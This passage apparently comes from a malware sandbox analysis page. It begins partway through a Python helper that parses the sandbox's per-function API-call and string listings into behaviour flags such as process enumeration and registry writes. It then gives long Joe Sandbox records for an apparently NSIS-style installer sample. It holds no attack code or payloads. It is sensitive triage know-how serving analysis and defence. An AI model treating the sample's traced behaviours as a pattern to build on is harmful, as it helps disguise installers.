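PROC_ENUM = {
    "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
    "CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
    "Module32FirstW", "Module32NextW",
}


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None  # callee address when the sandbox attributes the call to a subcall


@dataclass
class FunctionSummary:
    calls: list[Call] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)
    dynamic_imports: dict[str, list[str]] = field(default_factory=dict)
    flags: set[str] = field(default_factory=set)


def split_args(raw: str | None) -> list[str]:
    # Assumption: arguments never contain commas in these API bullets (true for this page).
    return [a.strip() for a in raw.split(",")] if raw else []


def summarize(record: str) -> FunctionSummary:
    s = FunctionSummary()
    last_lib: str | None = None
    for line in record.splitlines():
        if not line.strip():
            continue
        m = API_RE.match(line)
        if m:
            call = Call(m["api"], m["mod"], split_args(m["args"]), m["ref"], m["sub"])
            s.calls.append(call)
            if call.subcall_of:
                continue  # pattern logic is about this function's own calls only
            if call.api in LOADLIBRARY and call.args:
                last_lib = call.args[0]
                s.dynamic_imports.setdefault(last_lib, [])
            elif call.api == "GetProcAddress" and len(call.args) >= 2 and not POINTER_RE.match(call.args[1]):
                # Assumption: the handle is printed as 00000000, so pair the export with the
                # most recent LoadLibrary in call order rather than by handle value.
                s.dynamic_imports.setdefault(last_lib or "<unknown module>", []).append(call.args[1])
            elif call.api.startswith(("RegSetValue", "RegCreateKey")):
                s.flags.add("registry-write")
            continue
        m = STR_RE.match(line)
        if m:
            s.strings.append((m["text"], m["xref"]))
    resolved = {name for names in s.dynamic_imports.values() for name in names}
    if resolved:
        s.flags.add("dynamic-api-resolution")
    if resolved & PROC_ENUM:
        s.flags.add("process-enumeration")
    return s


if __name__ == "__main__":
    for label, record in (("PSAPI routine", PSAPI_RECORD), ("WriteReg routine", WRITEREG_RECORD)):
        summary = summarize(record)
        print(label, sorted(summary.flags), summary.dynamic_imports, len(summary.strings), "strings")
```

                                                          Running the script on the two records yields the flags dynamic-api-resolution and process-enumeration for the first routine, with PSAPI.DLL mapped to the three resolved exports, and registry-write alone for the second, together with its six log strings and their xrefs. The same parser can be pointed at any other function record in this report by pasting its bullets.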
                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3734993849-2769509956
                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                          APIs
                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                          • SendMessageW.USER32(00000000,0000045B,00000001), ref: 0040419E
                                                          • GetSysColor.USER32(?), ref: 004041AF
                                                          • SendMessageW.USER32(00000000,00000443,?,?), ref: 004041BD
                                                          • SendMessageW.USER32(00000000,00000445,?,04010000), ref: 004041CB
                                                          • lstrlenW.KERNEL32(?,?,04010000,?,?,?,00000000), ref: 004041D6
                                                          • SendMessageW.USER32(00000000,00000435,?,00000000), ref: 004041E3
                                                          • SendMessageW.USER32(00000000,00000449,?,?), ref: 004041F2
                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00403FE1
                                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001), ref: 00403FF0
                                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00404004
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ByteCharMultiWide$AllocButtonCheckColorGlobalItemlstrlen
                                                          • String ID:
                                                          • API String ID: 3308522672-0
                                                          • Opcode ID: c2e5bf2fee51a3b87e923a3f0ec37a23181173616caa330dd2575270d9358daf
                                                          • Instruction ID: f43bbde6d36b0f8d2302eacd2e434541dff8fa1ace2a4d459b82edc74fb6029a
                                                          • Opcode Fuzzy Hash: c2e5bf2fee51a3b87e923a3f0ec37a23181173616caa330dd2575270d9358daf
                                                          • Instruction Fuzzy Hash: B431B2B1900109BFDB009F64DD85E6E3BA9FB44709F00803AFA05FB2E1D7789A51DB59
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                          Strings
                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                          • API String ID: 1033533793-945480824
                                                          • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                          • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                          APIs
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                          Strings
                                                          • Exec: success ("%s"), xrefs: 00402263
                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                          • Exec: command="%s", xrefs: 00402241
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                          • API String ID: 2014279497-3433828417
                                                          • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                          • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                          • GetMessagePos.USER32 ref: 00404871
                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                          • MulDiv.KERNEL32(0000E000,00000064,?), ref: 00403295
                                                          • wsprintfW.USER32 ref: 004032A5
                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                          • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                          • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                          • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                          APIs
                                                          • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                          • wsprintfW.USER32 ref: 00404457
                                                          • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$@rD
                                                          • API String ID: 3540041739-1813061909
                                                          • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                          • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                          • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                          • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                          • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                          • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                          • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                          • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                          • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                          • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                          • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 004020A3
                                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                          APIs
                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Strings
                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                          • API String ID: 1697273262-1764544995
                                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID: $@rD
                                                          • API String ID: 3748168415-881980237
                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                          APIs
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                          Similarity
                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                          • String ID: CopyFiles "%s"->"%s"
                                                          • API String ID: 2577523808-3778932970
                                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                          APIs
                                                          Similarity
                                                          • API ID: lstrcatwsprintf
                                                          • String ID: %02x%c$...
                                                          • API String ID: 3065427908-1057055748
                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                          • API String ID: 2266616436-4211696005
                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00402100
                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                          • String ID:
                                                          • API String ID: 1599320355-0
                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                          APIs
                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                          Similarity
                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                          • String ID: Version
                                                          • API String ID: 512980652-315105994
                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
